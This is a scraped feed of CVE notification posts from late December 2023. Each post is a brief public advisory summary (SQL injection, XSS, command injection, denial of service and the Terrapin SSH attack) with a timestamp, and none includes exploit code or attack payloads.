🚨 CVE-2023-49000An issue in ArtistScope ArtisBrowser v.34.1.5 and before allows an attacker to bypass intended access restrictions via interaction with the com.artis.browser.IntentReceiverActivity component.🎖@cveNotify |
|
| 2023-12-28 15:24:43 |
🚨 CVE-2023-46918Phlox com.phlox.simpleserver.plus (aka Simple HTTP Server PLUS) 1.8.1-plus has an Android manifest file that contains an entry with the android:allowBackup attribute set to true. This could be leveraged by an attacker with physical access to the device.🎖@cveNotify |
|
| 2023-12-28 15:24:40 |
🚨 CVE-2023-33222When handling contactless cards, usage of a specific function to get additional information from the card which doesn't check the boundary on the data received while reading. This allows a stack-based buffer overflow that could lead to a potential Remote Code Execution on the targeted device🎖@cveNotify |
|
| 2023-12-28 15:24:39 |
🚨 CVE-2023-3656cashIT! - serving solutions. Devices from "PoS/ Dienstleistung, Entwicklung & Vertrieb GmbH" to 03.A06rks 2023.02.37 are affected by an unauthenticated remote code execution vulnerability. This vulnerability can be triggered by an HTTP endpoint exposed to the network.🎖@cveNotify |
|
| 2023-12-28 15:24:38 |
🚨 CVE-2022-23125This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the copyapplfile function. When parsing the len element, the process does not properly validate the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15869.🎖@cveNotify |
|
| 2023-12-28 15:24:34 |
🚨 CVE-2022-22995The combination of primitives offered by SMB and AFP in their default configuration allows the arbitrary writing of files. By exploiting these combination of primitives, an attacker can execute arbitrary code.🎖@cveNotify |
|
| 2023-12-28 15:24:33 |
🚨 CVE-2009-2698The udp_sendmsg function in the UDP implementation in (1) net/ipv4/udp.c and (2) net/ipv6/udp.c in the Linux kernel before 2.6.19 allows local users to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via vectors involving the MSG_MORE flag and a UDP socket.🎖@cveNotify |
|
| 2023-12-28 15:24:32 |
🚨 CVE-2009-0949The ippReadIO function in cups/ipp.c in cupsd in CUPS before 1.3.10 does not properly initialize memory for IPP request packets, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a scheduler request with two consecutive IPP_TAG_UNSUPPORTED tags.🎖@cveNotify |
|
| 2023-12-28 14:54:44 |
🚨 CVE-2023-39551PHPGurukul Online Security Guards Hiring System v.1.0 is vulnerable to SQL Injection via osghs/admin/search.php.🎖@cveNotify |
|
| 2023-12-28 14:24:45 |
🚨 CVE-2023-7126A vulnerability classified as critical has been found in code-projects Automated Voting System 1.0. This affects an unknown part of the file /admin/ of the component Admin Login. The manipulation of the argument username leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249129 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-28 14:24:38 |
🚨 CVE-2023-7057A vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744.🎖@cveNotify |
|
| 2023-12-28 14:24:37 |
🚨 CVE-2023-7055A vulnerability classified as problematic has been found in PHPGurukul Online Notes Sharing System 1.0. Affected is an unknown function of the file /user/profile.php of the component Contact Information Handler. The manipulation of the argument mobilenumber leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-248742 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-28 14:24:33 |
🚨 CVE-2023-7052A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been classified as problematic. This affects an unknown part of the file /user/profile.php. The manipulation of the argument name leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248739.🎖@cveNotify |
|
| 2023-12-28 14:24:32 |
🚨 CVE-2023-47265Apache Airflow, versions 2.6.0 through 2.7.3 has a stored XSS vulnerability that allows a DAG author to add an unbounded and not-sanitized javascript in the parameter description field of the DAG. This Javascript can be executed on the client side of any of the user who looks at the tasks in the browser sandbox. While this issue does not allow to exit the browser sandbox or manipulation of the server-side data - more than the DAG author already has, it allows to modify what the user looking at the DAG details sees in the browser - which opens up all kinds of possibilities of misleading other users.Users of Apache Airflow are recommended to upgrade to version 2.8.0 or newer to mitigate the risk associated with this vulnerability🎖@cveNotify |
|
| 2023-12-28 13:54:39 |
🚨 CVE-2023-50783Apache Airflow, versions before 2.8.0, is affected by a vulnerability that allows an authenticated user without the variable edit permission, to update a variable.This flaw compromises the integrity of variable management, potentially leading to unauthorized data modification.Users are recommended to upgrade to 2.8.0, which fixes this issue🎖@cveNotify |
|
| 2023-12-28 13:54:38 |
🚨 CVE-2023-46149Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra.This issue affects Themify Ultra: from n/a through 7.3.5.🎖@cveNotify |
|
| 2023-12-28 13:54:33 |
🚨 CVE-2023-31215Unrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon.This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2.🎖@cveNotify |
|
| 2023-12-28 13:54:32 |
🚨 CVE-2023-29102Unrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import.This issue affects Olive One Click Demo Import: from n/a through 1.1.1.🎖@cveNotify |
|
| 2023-12-28 12:24:38 |
🚨 CVE-2023-50855Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Sam Perrow Pre* Party Resource Hints.This issue affects Pre* Party Resource Hints: from n/a through 1.8.18.🎖@cveNotify |
|
| 2023-12-28 12:24:37 |
🚨 CVE-2023-50854Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Squirrly Squirrly SEO - Advanced Pack.This issue affects Squirrly SEO - Advanced Pack: from n/a through 2.3.8.🎖@cveNotify |
|
| 2023-12-28 12:24:33 |
🚨 CVE-2023-50852Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in StylemixThemes Booking Calendar | Appointment Booking | BookIt.This issue affects Booking Calendar | Appointment Booking | BookIt: from n/a through 2.4.3.🎖@cveNotify |
|
| 2023-12-28 12:24:32 |
🚨 CVE-2023-50848Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Aaron J 404 Solution.This issue affects 404 Solution: from n/a through 2.34.0.🎖@cveNotify |
|
| 2023-12-28 11:24:45 |
🚨 CVE-2023-50873Cross-Site Request Forgery (CSRF) vulnerability in Marios Alexandrou Add Any Extension to Pages.This issue affects Add Any Extension to Pages: from n/a through 1.4.🎖@cveNotify |
|
| 2023-12-28 11:24:39 |
🚨 CVE-2023-50860Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in TMS Booking for Appointments and Events Calendar – Amelia allows Stored XSS.This issue affects Booking for Appointments and Events Calendar – Amelia: from n/a through 1.0.85.🎖@cveNotify |
|
| 2023-12-28 11:24:38 |
🚨 CVE-2023-50856Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FunnelKit Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits.This issue affects Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels & Maximize Profits: from n/a through 2.14.3.🎖@cveNotify |
|
| 2023-12-28 11:24:33 |
🚨 CVE-2023-36381Deserialization of Untrusted Data vulnerability in Gesundheit Bewegt GmbH Zippy.This issue affects Zippy: from n/a through 1.6.5.🎖@cveNotify |
|
| 2023-12-28 11:24:32 |
🚨 CVE-2023-27447Exposure of Sensitive Information to an Unauthorized Actor vulnerability in VeronaLabs WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc.This issue affects WP SMS – Messaging & SMS Notification for WordPress, WooCommerce, GravityForms, etc: from n/a through 6.0.4.🎖@cveNotify |
|
| 2023-12-28 10:24:33 |
🚨 CVE-2023-4671Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Talent Software ECOP allows Command Line Execution through SQL Injection.This issue affects ECOP: before 32255.🎖@cveNotify |
|
| 2023-12-28 09:24:32 |
🚨 CVE-2023-6190Improper Input Validation vulnerability in İzmir Katip Çelebi University University Information Management System allows Absolute Path Traversal.This issue affects University Information Management System: before 30.11.2023.🎖@cveNotify |
|
| 2023-12-28 08:24:32 |
🚨 CVE-2023-45702An HCL UrbanCode Deploy Agent installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts..🎖@cveNotify |
|
| 2023-12-28 07:24:32 |
🚨 CVE-2023-45701HCL Launch could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system.🎖@cveNotify |
|
| 2023-12-28 06:24:33 |
🚨 CVE-2023-49469Reflected Cross Site Scripting (XSS) vulnerability in Shaarli v0.12.2, allows remote attackers to execute arbitrary code via search tag function.🎖@cveNotify |
|
| 2023-12-28 06:24:32 |
🚨 CVE-2023-46989SQL Injection vulnerability in the Innovadeluxe Quick Order module for PrestaShop before v.1.4.0, allows local attackers to execute arbitrary code via the getProducts() function in the productlist.php file.🎖@cveNotify |
|
| 2023-12-28 05:24:32 |
🚨 CVE-2023-50445Shell Injection vulnerability GL.iNet A1300 v4.4.6, AX1800 v4.4.6, AXT1800 v4.4.6, MT3000 v4.4.6, MT2500 v4.4.6, MT6000 v4.5.0, MT1300 v4.3.7, MT300N-V2 v4.3.7, AR750S v4.3.7, AR750 v4.3.7, AR300M v4.3.7, and B1300 v4.3.7., allows local attackers to execute arbitrary code via the get_system_log and get_crash_log functions of the logread module, as well as the upgrade_online function of the upgrade module.🎖@cveNotify |
|
| 2023-12-28 04:24:33 |
🚨 CVE-2023-51006An issue in the openFile method of Chinese Perpetual Calendar v9.0.0 allows attackers to read any file via unspecified vectors.🎖@cveNotify |
|
| 2023-12-28 04:24:32 |
🚨 CVE-2023-49228An issue was discovered in Peplink Balance Two before 8.4.0. Console port authentication uses hard-coded credentials, which allows an attacker with physical access and sufficient knowledge to execute arbitrary commands as root.🎖@cveNotify |
|
| 2023-12-28 03:24:32 |
🚨 CVE-2023-48795The SSH transport protocol with certain OpenSSH extensions, found in OpenSSH before 9.6 and other products, allows remote attackers to bypass integrity checks such that some packets are omitted (from the extension negotiation message), and a client and server may consequently end up with a connection for which some security features have been downgraded or disabled, aka a Terrapin attack. This occurs because the SSH Binary Packet Protocol (BPP), implemented by these extensions, mishandles the handshake phase and mishandles use of sequence numbers. For example, there is an effective attack against SSH's use of ChaCha20-Poly1305 (and CBC with Encrypt-then-MAC). The bypass occurs in chacha20-poly1305@openssh.com and (if CBC is used) the -etm@openssh.com MAC algorithms. This also affects Maverick Synergy Java SSH API before 3.1.0-SNAPSHOT, Dropbear through 2022.83, Ssh before 5.1.1 in Erlang/OTP, PuTTY before 0.80, AsyncSSH before 2.14.2, golang.org/x/crypto before 0.17.0, libssh before 0.10.6, libssh2 through 1.11.0, Thorn Tech SFTP Gateway before 3.4.6, Tera Term before 5.1, Paramiko before 3.4.0, jsch before 0.2.15, SFTPGo before 2.5.6, Netgate pfSense Plus through 23.09.1, Netgate pfSense CE through 2.7.2, HPN-SSH through 18.2.0, ProFTPD before 1.3.8b (and before 1.3.9rc2), ORYX CycloneSSH before 2.3.4, NetSarang XShell 7 before Build 0144, CrushFTP before 10.6.0, ConnectBot SSH library before 2.2.22, Apache MINA sshd through 2.11.0, sshj through 0.37.0, TinySSH through 20230101, trilead-ssh2 6401, LANCOM LCOS and LANconfig, FileZilla before 3.66.4, Nova before 11.8, PKIX-SSH before 14.4, SecureCRT before 9.4.3, Transmit5 before 5.10.4, Win32-OpenSSH before 9.5.0.0p1-Beta, WinSCP before 6.2.2, Bitvise SSH Server before 9.32, Bitvise SSH Client before 9.33, KiTTY through 0.76.1.13, the net-ssh gem 7.2.0 for Ruby, the mscdex ssh2 module before 1.15.0 for Node.js, the thrussh library before 0.35.1 for Rust, and the Russh crate before 0.40.2 for Rust.🎖@cveNotify |
|
| 2023-12-28 02:24:32 |
🚨 CVE-2023-27043The email module of Python through 3.11.3 incorrectly parses e-mail addresses that contain a special character. The wrong portion of an RFC2822 header is identified as the value of the addr-spec. In some applications, an attacker can bypass a protection mechanism in which application access is granted only after verifying receipt of e-mail to a specific domain (e.g., only @company.example.com addresses may be used for signup). This occurs in email/_parseaddr.py in recent versions of Python.🎖@cveNotify |
|
| 2023-12-28 00:24:45 |
🚨 CVE-2021-42314Microsoft Defender for IoT Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-28 00:24:39 |
🚨 CVE-2021-42313Microsoft Defender for IoT Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-28 00:24:38 |
🚨 CVE-2021-42294Microsoft SharePoint Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-28 00:24:33 |
🚨 CVE-2021-41333Windows Print Spooler Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-28 00:24:32 |
🚨 CVE-2021-40452HEVC Video Extensions Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-12-27 23:24:32 |
🚨 CVE-2023-6879Increasing the resolution of video frames, while performing a multi-threaded encode, can result in a heap overflow in av1_loop_restoration_dealloc().🎖@cveNotify |
|
| 2023-12-27 22:24:45 |
🚨 CVE-2023-49000An issue in ArtistScope ArtisBrowser v.34.1.5 and before allows an attacker to bypass intended access restrictions via interaction with the com.artis.browser.IntentReceiverActivity component.🎖@cveNotify |
|
| 2023-12-27 22:24:38 |
🚨 CVE-2022-48554File before 5.43 has an stack-based buffer over-read in file_copystr in funcs.c. NOTE: "File" is the name of an Open Source project.🎖@cveNotify |
|
| 2023-12-27 22:24:37 |
🚨 CVE-2022-46725A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation. This issue is fixed in iOS 16.4 and iPadOS 16.4. Visiting a malicious website may lead to address bar spoofing.🎖@cveNotify |
|
| 2023-12-27 22:24:33 |
🚨 CVE-2023-34966An infinite loop vulnerability was found in Samba's mdssvc RPC service for Spotlight. When parsing Spotlight mdssvc RPC packets sent by the client, the core unmarshalling function sl_unpack_loop() did not validate a field in the network packet that contains the count of elements in an array-like structure. By passing 0 as the count value, the attacked function will run in an endless loop consuming 100% CPU. This flaw allows an attacker to issue a malformed RPC request, triggering an infinite loop, resulting in a denial of service condition.🎖@cveNotify |
|
| 2023-12-27 22:24:32 |
🚨 CVE-2021-21655A cross-site request forgery (CSRF) vulnerability in Jenkins P4 Plugin 1.11.4 and earlier allows attackers to connect to an attacker-specified Perforce server using attacker-specified username and password.🎖@cveNotify |
|
| 2023-12-27 21:54:45 |
🚨 CVE-2023-51050S-CMS v5.0 was discovered to contain a SQL injection vulnerability via the A_productauth parameter at /admin/ajax.php.🎖@cveNotify |
|
| 2023-12-27 21:54:38 |
🚨 CVE-2023-45119Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'n' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-27 21:54:37 |
🚨 CVE-2023-45117Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'eid' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-27 21:54:33 |
🚨 CVE-2023-45115Online Examination System v1.0 is vulnerable to multiple Authenticated SQL Injection vulnerabilities. The 'ch' parameter of the update.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-27 21:54:32 |
🚨 CVE-2023-50827Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Accredible Accredible Certificates & Open Badges allows Stored XSS.This issue affects Accredible Certificates & Open Badges: from n/a through 1.4.8.🎖@cveNotify |
|
| 2023-12-27 21:24:45 |
🚨 CVE-2023-51013TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanNetmask parameter’ of the setLanConfig interface of the cstecgi .cgi.🎖@cveNotify |
|
| 2023-12-27 21:24:39 |
🚨 CVE-2023-51012TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the lanGateway parameter’ of the setLanConfig interface of the cstecgi .cgi.🎖@cveNotify |
|
| 2023-12-27 21:24:38 |
🚨 CVE-2023-51026TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to unauthorized arbitrary command execution in the ‘hour’ parameter of the setRebootScheCfg interface of the cstecgi .cgi.🎖@cveNotify |
|
| 2023-12-27 21:24:37 |
🚨 CVE-2023-51025TOTOlink EX1800T V9.1.0cu.2112_B20220316 is vulnerable to an unauthorized arbitrary command execution in the ‘admuser’ parameter of the setPasswordCfg interface of the cstecgi .cgi.🎖@cveNotify |
|
| 2023-12-27 21:24:33 |
🚨 CVE-2023-51023TOTOlink EX1800T v9.1.0cu.2112_B20220316 is vulnerable to arbitrary command execution in the ‘host_time’ parameter of the NTPSyncWithHost interface of the cstecgi .cgi.🎖@cveNotify |
|
| 2023-12-27 21:24:32 |
🚨 CVE-2023-7020A vulnerability was found in Tongda OA 2017 up to 11.9 and classified as critical. This issue affects some unknown processing of the file general/wiki/cp/ct/view.php. The manipulation of the argument TEMP_ID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 11.10 is able to address this issue. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-248567. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-27 20:54:51 |
🚨 CVE-2023-49690Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'WalkinId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-27 20:54:45 |
🚨 CVE-2023-49689Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'JobId' parameter of the Employer/DeleteJob.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-27 20:54:44 |
🚨 CVE-2023-49686Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTotal' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-27 20:54:43 |
🚨 CVE-2023-49685Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTime' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-27 20:54:39 |
🚨 CVE-2023-49684Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtTitle' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-27 20:54:38 |
🚨 CVE-2023-49683Job Portal v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'txtDesc' parameter of the Employer/InsertWalkin.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-12-27 20:24:38 |
🚨 CVE-2023-47990SQL Injection vulnerability in components/table_manager/html/edit_admin_table.php in CuppaCMS V1.0 allows attackers to run arbitrary SQL commands via the table parameter.🎖@cveNotify |
|
| 2023-12-27 20:24:33 |
🚨 CVE-2023-34385Unrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus.This issue affects Export Import Menus: from n/a through 1.8.0.🎖@cveNotify |
|
| 2023-12-27 20:24:32 |
🚨 CVE-2022-47597Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker – Popup for opt-ins, lead gen, & more.This issue affects Popup Maker – Popup for opt-ins, lead gen, & more: from n/a through 1.17.1.🎖@cveNotify |
|
| 2023-12-27 19:54:45 |
🚨 CVE-2023-45603Unrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts – Enable Users to Submit Posts from the Front End.This issue affects User Submitted Posts – Enable Users to Submit Posts from the Front End: from n/a through 20230902.🎖@cveNotify |
|
| 2023-12-27 19:54:39 |
🚨 CVE-2023-42801Moonlight-common-c contains the core GameStream client code shared between Moonlight clients. Moonlight-common-c is vulnerable to buffer overflow starting in commit f57bd745b4cbed577ea654fad4701bea4d38b44c. A malicious game streaming server could exploit a buffer overflow vulnerability to crash a moonlight client. Achieving RCE is possible but unlikely, due to stack canaries in use by modern compiler toolchains. The published binaries for official clients Qt, Android, iOS/tvOS, and Embedded are built with stack canaries, but some unofficial clients may not use stack canaries. This vulnerability takes place after the pairing process, so it requires the client to be tricked into pairing to a malicious host. It is not possible to perform using a man-in-the-middle due to public key pinning that takes place during the pairing process. The bug was addressed in commit b2497a3918a6d79808d9fd0c04734786e70d5954.🎖@cveNotify |
|
| 2023-12-27 19:54:38 |
🚨 CVE-2023-44286Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain a DOM-based Cross-Site Scripting vulnerability. A remote unauthenticated attacker could potentially exploit this vulnerability, leading to the injection of malicious HTML or JavaScript code to a victim user's DOM environment in the browser. . Exploitation may lead to information disclosure, session theft, or client-side request forgery.🎖@cveNotify |
|
| 2023-12-27 19:54:37 |
🚨 CVE-2023-44285Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an improper access control vulnerability. A local malicious user with low privileges could potentially exploit this vulnerability leading to escalation of privilege.🎖@cveNotify |
|
| 2023-12-27 19:54:33 |
🚨 CVE-2023-44279Dell PowerProtect DD , versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in administrator CLI. A local high privileged attacker could potentially exploit this vulnerability, to bypass security restrictions. Exploitation may lead to a system take over by an attacker🎖@cveNotify |
|
| 2023-12-27 19:54:32 |
🚨 CVE-2023-44277Dell PowerProtect DD, versions prior to 7.13.0.10, LTS 7.7.5.25, LTS 7.10.1.15, 6.2.1.110 contain an OS command injection vulnerability in the CLI. A local low privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker.🎖@cveNotify |
|
| 2023-12-27 18:54:39 |
🚨 CVE-2023-51459Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.🎖@cveNotify |
|
| 2023-12-27 18:54:38 |
🚨 CVE-2023-50715Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue.When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles.However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it.🎖@cveNotify |
|
| 2023-12-27 18:54:33 |
🚨 CVE-2023-49786Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1; as well as certified-asterisk prior to 18.9-cert6; Asterisk is susceptible to a DoS due to a race condition in the hello handshake phase of the DTLS protocol when handling DTLS-SRTP for media setup. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable Asterisk servers for calls that rely on DTLS-SRTP. Commit d7d7764cb07c8a1872804321302ef93bf62cba05 contains a fix, which is part of versions 18.20.1, 20.5.1, 21.0.1, amd 18.9-cert6.🎖@cveNotify |
|
| 2023-12-27 18:54:32 |
🚨 CVE-2023-5629A CWE-601:URL Redirection to Untrusted Site (‘Open Redirect’) vulnerability exists that couldcause disclosure of information through phishing attempts over HTTP.🎖@cveNotify |
|
| 2023-12-27 18:24:32 |
🚨 CVE-2023-42012An IBM UrbanCode Deploy Agent 7.2 through 7.2.3.7, and 7.3 through 7.3.2.2 installed as a Windows service in a non-standard location could be subject to a denial of service attack by local accounts. IBM X-Force ID: 265509.🎖@cveNotify |
|
| 2023-12-27 17:54:32 |
🚨 CVE-2023-47146IBM Qradar SIEM 7.5 could allow a privileged user to obtain sensitive domain information due to data being misidentified. IBM X-Force ID: 270372.🎖@cveNotify |
|
| 2023-12-27 17:24:38 |
🚨 CVE-2023-51443FreeSWITCH is a Software Defined Telecom Stack enabling the digital transformation from proprietary telecom switches to a software implementation that runs on any commodity hardware. Prior to version 1.10.11, when handling DTLS-SRTP for media setup, FreeSWITCH is susceptible to Denial of Service due to a race condition in the hello handshake phase of the DTLS protocol. This attack can be done continuously, thus denying new DTLS-SRTP encrypted calls during the attack. If an attacker manages to send a ClientHello DTLS message with an invalid CipherSuite (such as `TLS_NULL_WITH_NULL_NULL`) to the port on the FreeSWITCH server that is expecting packets from the caller, a DTLS error is generated. This results in the media session being torn down, which is followed by teardown at signaling (SIP) level too. Abuse of this vulnerability may lead to a massive Denial of Service on vulnerable FreeSWITCH servers for calls that rely on DTLS-SRTP. To address this vulnerability, upgrade FreeSWITCH to 1.10.11 which includes the security fix. The solution implemented is to drop all packets from addresses that have not been validated by an ICE check.🎖@cveNotify |
|
| 2023-12-27 17:24:33 |
🚨 CVE-2023-49166Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Magic Logix MSync.This issue affects MSync: from n/a through 1.0.0.🎖@cveNotify |
|
| 2023-12-27 17:24:32 |
🚨 CVE-2022-47599Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager.This issue affects File Manager – 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7.🎖@cveNotify |
|
| 2023-12-27 16:54:45 |
🚨 CVE-2014-7824D-Bus 1.3.0 through 1.6.x before 1.6.26, 1.8.x before 1.8.10, and 1.9.x before 1.9.2 allows local users to cause a denial of service (prevention of new connections and connection drop) by queuing the maximum number of file descriptors. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-3636.1.🎖@cveNotify |
|
| 2023-12-27 16:54:38 |
🚨 CVE-2014-3638The bus_connections_check_reply function in config-parser.c in D-Bus before 1.6.24 and 1.8.x before 1.8.8 allows local users to cause a denial of service (CPU consumption) via a large number of method calls.🎖@cveNotify |
|
| 2023-12-27 16:54:37 |
🚨 CVE-2014-3635Off-by-one error in D-Bus 1.3.0 through 1.6.x before 1.6.24 and 1.8.x before 1.8.8, when running on a 64-bit system and the max_message_unix_fds limit is set to an odd number, allows local users to cause a denial of service (dbus-daemon crash) or possibly execute arbitrary code by sending one more file descriptor than the limit, which triggers a heap-based buffer overflow or an assertion failure.🎖@cveNotify |
|
| 2023-12-27 16:54:33 |
🚨 CVE-2013-2168The _dbus_printf_string_upper_bound function in dbus/dbus-sysdeps-unix.c in D-Bus (aka DBus) 1.4.x before 1.4.26, 1.6.x before 1.6.12, and 1.7.x before 1.7.4 allows local users to cause a denial of service (service crash) via a crafted message.🎖@cveNotify |
|
| 2023-12-27 16:54:32 |
🚨 CVE-2011-2200The _dbus_header_byteswap function in dbus-marshal-header.c in D-Bus (aka DBus) 1.2.x before 1.2.28, 1.4.x before 1.4.12, and 1.5.x before 1.5.4 does not properly handle a non-native byte order, which allows local users to cause a denial of service (connection loss), obtain potentially sensitive information, or conduct unspecified state-modification attacks via crafted messages.🎖@cveNotify |
|
| 2023-12-27 16:24:32 |
🚨 CVE-2023-3171A flaw was found in EAP-7 during deserialization of certain classes, which permits instantiation of HashMap and HashTable with no checks on resources consumed. This issue could allow an attacker to submit malicious requests using these classes, which could eventually exhaust the heap and result in a Denial of Service.🎖@cveNotify |
|
| 2023-12-27 15:24:49 |
🚨 CVE-2023-6190Improper Input Validation vulnerability in İzmir Katip Çelebi University University Information Management System allows Absolute Path Traversal.This issue affects University Information Management System: before 30.11.2023.🎖@cveNotify |
|
| 2023-12-27 15:24:45 |
🚨 CVE-2023-28491Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Tribulant Slideshow Gallery LITE.This issue affects Slideshow Gallery LITE: from n/a through 1.7.6.🎖@cveNotify |
|
| 2023-12-27 15:24:44 |
🚨 CVE-2023-48237Vim is an open source command line text editor. In affected versions when shifting lines in operator pending mode and using a very large value, it may be possible to overflow the size of integer. Impact is low, user interaction is required and a crash may not even happen in all situations. This issue has been addressed in commit `6bf131888` which has been included in version 9.0.2112. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-27 15:24:43 |
🚨 CVE-2023-48236Vim is an open source command line text editor. When using the z= command, the user may overflow the count with values largerthan MAX_INT. Impact is low, user interaction is required and a crash may not even happen in all situations. This vulnerability has been addressed in commit `73b2d379` which has been included in release version 9.0.2111. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-27 15:24:40 |
